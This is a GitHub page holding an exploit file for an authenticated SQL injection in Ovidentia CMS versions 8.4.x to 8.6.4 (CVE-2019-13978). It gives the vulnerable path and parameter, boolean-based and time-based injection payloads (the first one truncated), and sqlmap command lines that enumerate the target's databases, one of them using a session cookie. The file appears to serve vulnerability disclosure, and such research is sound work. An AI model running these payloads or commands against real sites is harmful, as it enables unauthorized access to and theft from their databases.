-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploitSQLIOvidentia.txt
37 lines (29 loc) · 1.34 KB
/
exploitSQLIOvidentia.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - SQL Injection (Authenticated)
# Date: 06/05/2019
# [ CVE-2019-13978 ]
# Exploit Author:
# Fernando Pinheiro (n3k00n3)
# Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.x < 8.6.4
# Tested on: Mac,linux - Firefox, safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
Type: GET
Vulnerable Field: id
Payload:
1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)
URL: https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1
Using Request file
sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
Using Get
./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
---
[CHANGELOG]
4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.